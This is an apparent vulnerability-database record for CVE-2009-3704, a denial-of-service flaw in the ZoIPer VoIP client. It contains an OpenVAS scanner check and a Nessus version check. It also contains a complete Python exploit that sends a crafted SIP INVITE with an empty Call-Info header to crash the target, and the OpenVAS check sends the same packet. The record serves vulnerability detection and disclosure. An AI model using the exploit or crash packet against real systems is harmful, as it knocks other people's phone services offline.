ID CVE-2009-3704 Type cve Reporter cve@mitre.org Modified 2017-08-17T01:31:00
Description
ZoIPer 2.22, and possibly other versions before 2.24 Library 5324, allows remote attackers to cause a denial of service (crash) via a SIP INVITE request with an empty Call-Info header.
{"openvas": [{"lastseen": "2020-03-24T19:09:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3704"], "description": "This host is running ZoIPer and is prone to Denial of Service\n vulnerability.", "modified": "2020-03-20T00:00:00", "published": "2009-10-23T00:00:00", "id": "OPENVAS:1361412562310800963", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800963", "type": "openvas", "title": "ZoIPer Empty Call-Info Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZoIPer Empty Call-Info Denial of Service Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800963\");\n script_version(\"2020-03-20T14:37:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-20 14:37:25 +0000 (Fri, 20 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-10-23 16:18:41 +0200 (Fri, 23 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-3704\");\n script_name(\"ZoIPer Empty Call-Info Denial of Service Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"sip_detection.nasl\");\n script_mandatory_keys(\"sip/banner/available\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37015\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/53792\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/0910-exploits/zoiper_dos.py.txt\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause the service to crash.\");\n\n script_tag(name:\"affected\", value:\"ZoIPer version prior to 2.24 (Windows) and 2.13 (Linux).\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error while handling specially crafted SIP INVITE\n messages which contain an empty Call-Info header.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ZoIPer version 2.24 (Windows) and 2.13 (Linux) or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running ZoIPer and is prone to Denial of Service\n vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"sip.inc\");\ninclude(\"misc_func.inc\");\n\ninfos = sip_get_port_proto( default_port:\"5060\", default_proto:\"udp\" );\nport = infos[\"port\"];\nproto = infos[\"proto\"];\n\nbanner = sip_get_banner( port:port, proto:proto );\nif( !banner || \"Zoiper\" >!< banner ) exit( 0 );\n\nif( ! sip_alive( port:port, proto:proto ) ) exit( 0 );\n\nvt_strings = get_vt_strings();\nfrom_default = vt_strings[\"default\"];\nfrom_lower = vt_strings[\"lowercase\"];\n\nreq = string(\n \"INVITE sip:\", from_lower, \"@\", get_host_name(), \" SIP/2.0\",\"\\r\\n\",\n \"Via: SIP/2.0/\", toupper( proto ), \" \", this_host(), \":\", port, \";branch=z9hG4bKJRnTggvMGl-6233\",\"\\r\\n\",\n \"Max-Forwards: 70\",\"\\r\\n\",\n \"From: \", from_default, \" <sip:\", from_lower, \"@\", this_host(),\">;tag=f7mXZqgqZy-6233\",\"\\r\\n\",\n \"To: \", from_default, \" <sip:\", from_lower, \"@\", get_host_name(), \":\", port, \">\",\"\\r\\n\",\n \"Call-ID: \", rand(),\"\\r\\n\",\n \"CSeq: 6233 INVITE\",\"\\r\\n\",\n \"Contact: \", from_default, \" <sip:\", from_lower, \"@\", get_host_name(),\">\",\"\\r\\n\",\n \"Content-Type: application/sdp\",\"\\r\\n\",\n \"Call-Info:\",\"\\r\\n\",\n \"Content-Length: 125\",\"\\r\\n\\r\\n\");\nsip_send_recv( port:port, data:req, proto:proto );\n\nif( ! sip_alive( port:port, proto:proto ) ) {\n security_message( port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T11:40:53", "description": "ZoIPer Call-Info DoS. CVE-2009-3704. Dos exploits for multiple platform", "published": "2009-10-14T00:00:00", "type": "exploitdb", "title": "ZoIPer 2.22 - Call-Info Remote Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3704"], "modified": "2009-10-14T00:00:00", "id": "EDB-ID:9987", "href": "https://www.exploit-db.com/exploits/9987/", "sourceData": "#!/usr/bin/python\r\n\r\n# ZoIPer v2.22 Call-Info Remote Denial Of Service.\r\n# Remote Crash P.O.C.\r\n# Author: Tomer Bitton (Gr33n_G0bL1n)\r\n# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10\r\n#\r\n# Vendor Notified on: 21/09/2009\r\n# Vendor Fix: Fixed in version 2.24 Library 5324\r\n#\r\n# Bad Chars: \\x20 , \\x09\r\n\r\nimport sys\r\nimport socket\r\nimport os\r\n\r\n\r\ndef main(argc , argv):\r\n\r\n\tif len(sys.argv) != 2:\r\n\t\tos.system(\"cls\")\r\n\t\tsys.exit(\"Usage: \" + sys.argv[0] + \" <target_ip>\\n\")\r\n\t\r\n\ttarget_host = sys.argv[1]\r\n\ttarget_port = 5060\r\n\r\n\tevil_packet = \"\\x49\\x4e\\x56\\x49\\x54\\x45\\x20\\x73\\x69\\x70\\x3a\\x4e\\x65\\x6f\\x40\\x31\"+\\\r\n\t\t\t\t\t\"\\x30\\x2e\\x30\\x2e\\x30\\x2e\\x31\\x20\\x53\\x49\\x50\\x2f\\x32\\x2e\\x30\\x0d\"+\\\r\n\t\t\t\t\t\"\\x0a\\x56\\x69\\x61\\x3a\\x20\\x53\\x49\\x50\\x2f\\x32\\x2e\\x30\\x2f\\x55\\x44\"+\\\r\n\t\t\t\t\t\"\\x50\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x35\\x37\\x2e\\x31\\x33\\x31\"+\\\r\n\t\t\t\t\t\"\\x3a\\x31\\x32\\x39\\x38\\x3b\\x62\\x72\\x61\\x6e\\x63\\x68\\x3d\\x7a\\x39\\x68\"+\\\r\n\t\t\t\t\t\"\\x47\\x34\\x62\\x4b\\x4a\\x52\\x6e\\x54\\x67\\x67\\x76\\x4d\\x47\\x6c\\x2d\\x36\"+\\\r\n\t\t\t\t\t\"\\x32\\x33\\x33\\x0d\\x0a\\x4d\\x61\\x78\\x2d\\x46\\x6f\\x72\\x77\\x61\\x72\\x64\"+\\\r\n\t\t\t\t\t\"\\x73\\x3a\\x20\\x37\\x30\\x0d\\x0a\\x46\\x72\\x6f\\x6d\\x3a\\x20\\x4d\\x6f\\x72\"+\\\r\n\t\t\t\t\t\"\\x70\\x68\\x65\\x75\\x73\\x20\\x3c\\x73\\x69\\x70\\x3a\\x4d\\x6f\\x72\\x70\\x68\"+\\\r\n\t\t\t\t\t\"\\x65\\x75\\x73\\x40\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x35\\x37\\x2e\\x31\"+\\\r\n\t\t\t\t\t\"\\x33\\x31\\x3e\\x3b\\x74\\x61\\x67\\x3d\\x66\\x37\\x6d\\x58\\x5a\\x71\\x67\\x71\"+\\\r\n\t\t\t\t\t\"\\x5a\\x79\\x2d\\x36\\x32\\x33\\x33\\x0d\\x0a\\x54\\x6f\\x3a\\x20\\x4e\\x65\\x6f\"+\\\r\n\t\t\t\t\t\"\\x20\\x3c\\x73\\x69\\x70\\x3a\\x4e\\x65\\x6f\\x40\\x31\\x30\\x2e\\x30\\x2e\\x30\"+\\\r\n\t\t\t\t\t\"\\x2e\\x31\\x3e\\x0d\\x0a\\x43\\x61\\x6c\\x6c\\x2d\\x49\\x44\\x3a\\x20\\x77\\x53\"+\\\r\n\t\t\t\t\t\"\\x48\\x68\\x48\\x6a\\x6e\\x67\\x39\\x39\\x2d\\x36\\x32\\x33\\x33\\x40\\x31\\x39\"+\\\r\n\t\t\t\t\t\"\\x32\\x2e\\x31\\x36\\x38\\x2e\\x35\\x37\\x2e\\x31\\x33\\x31\\x0d\\x0a\\x43\\x53\"+\\\r\n\t\t\t\t\t\"\\x65\\x71\\x3a\\x20\\x36\\x32\\x33\\x33\\x20\\x49\\x4e\\x56\\x49\\x54\\x45\\x0d\"+\\\r\n\t\t\t\t\t\"\\x0a\\x43\\x6f\\x6e\\x74\\x61\\x63\\x74\\x3a\\x20\\x3c\\x73\\x69\\x70\\x3a\\x4d\"+\\\r\n\t\t\t\t\t\"\\x6f\\x72\\x70\\x68\\x65\\x75\\x73\\x40\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\"+\\\r\n\t\t\t\t\t\"\\x35\\x37\\x2e\\x31\\x33\\x31\\x3e\\x0d\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\"+\\\r\n\t\t\t\t\t\"\\x2d\\x54\\x79\\x70\\x65\\x3a\\x20\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\"+\\\r\n\t\t\t\t\t\"\\x6f\\x6e\\x2f\\x73\\x64\\x70\\x0d\\x0a\\x43\\x61\\x6c\\x6c\\x2d\\x49\\x6e\\x66\"+\\\r\n\t\t\t\t\t\"\\x6f\\x3a\\x20\\x20\\x0d\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x4c\"+\\\r\n\t\t\t\t\t\"\\x65\\x6e\\x67\\x74\\x68\\x3a\\x20\\x31\\x32\\x35\\x0d\\x0a\\x0d\\x0a\"\r\n\t\r\n\tos.system(\"cls\")\t\t\t\t\r\n\tprint \"[+] ZoIPer Call-Info Remote Denial Of Service\\r\\n\"\r\n\tprint \"[+] Exploited By Gr33n_G0bL1n\\r\\n\"\r\n\tprint \"[+] Connecting to %s on port %d\\r\\n\" % (target_host,target_port)\r\n\t\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\ttry:\r\n\t\ts.connect((target_host,target_port))\r\n\t\tprint \"[+] Trying To Send Evil Packet...\\r\\n\"\r\n\t\ts.sendall(evil_packet)\r\n\t\ts.close()\r\n\t\tprint \"[+] Done!\\r\\n\"\r\n\texcept:\r\n\t\tprint \"[x] Connection Error!\\r\\n\"\r\n\r\n\r\nif (__name__ == \"__main__\"):\r\n\tsys.exit(main(len(sys.argv), sys.argv))\r\n\t", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9987/"}], "nessus": [{"lastseen": "2021-03-01T07:50:37", "description": "According to its version, the instance of Zoiper, a VoIP software\nphone application, installed on the remote host may crash if it\nreceives a specially crafted SIP packet.\n\nAn unauthenticated, remote attacker can leverage this issue to deny\nservice to legitimate users.", "edition": 24, "published": "2010-08-09T00:00:00", "title": "ZoIPer < 2.24 Crafted SIP INVITE Request Remote DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3704"], "modified": "2021-03-02T00:00:00", "cpe": [], "id": "ZOIPER_2_24.NASL", "href": "https://www.tenable.com/plugins/nessus/48273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(48273);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/08/07 16:46:51\");\n\n script_cve_id(\"CVE-2009-3704\");\n script_bugtraq_id(42214);\n script_xref(name:\"EDB-ID\", value:\"9987\");\n\n script_name(english:\"ZoIPer < 2.24 Crafted SIP INVITE Request Remote DoS\");\n script_summary(english:\"Checks file version of zoiper.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is susceptible to\na denial of service attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Zoiper, a VoIP software\nphone application, installed on the remote host may crash if it\nreceives a specially crafted SIP packet.\n\nAn unauthenticated, remote attacker can leverage this issue to deny\nservice to legitimate users.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.24 or later as that reportedly addresses the\nissue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(1, \"The registry wasn't enumerated.\");\n\n\n# Connect to the appropriate share.\nname = kb_smb_name();\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n\n# Connect to remote registry.\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n exit(1, \"Can't connect to remote registry.\");\n}\n\n\n# Find where it's installed.\npath = NULL;\n\nkey = \"SOFTWARE\\Attractel\\Zoiper\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n value = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(value)) path = value[1];\n\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hklm);\n\nif (isnull(path))\n{\n NetUseDel();\n exit(0, \"Zoiper is not installed.\");\n}\nNetUseDel(close:FALSE);\n\n\n# Check the version of the main exe.\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\nexe = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\zoiper.exe\", string:path);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to \"+share+\" share.\");\n}\n\nfh = CreateFile(\n file : exe,\n desired_access : GENERIC_READ,\n file_attributes : FILE_ATTRIBUTE_NORMAL,\n share_mode : FILE_SHARE_READ,\n create_disposition : OPEN_EXISTING\n);\n\nver = NULL;\nif (!isnull(fh))\n{\n ver = GetFileVersion(handle:fh);\n CloseFile(handle:fh);\n}\nNetUseDel();\n\n\n# Check the version number.\nif (!isnull(ver))\n{\n version = ver[0] + '.' + ver[2];\n fixed_version = '2.24';\n\n # nb: we're checking the file version, not the user-friendly version.\n if (ver_compare(ver:ver, fix:\"2.0.24.0\") == -1)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n }\n exit(0, \"Zoiper version \"+version+\" is installed and hence not affected.\");\n}\nelse exit(1, \"Couldn't get file version of '\"+(share-'$')+\":\"+exe+\"'.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}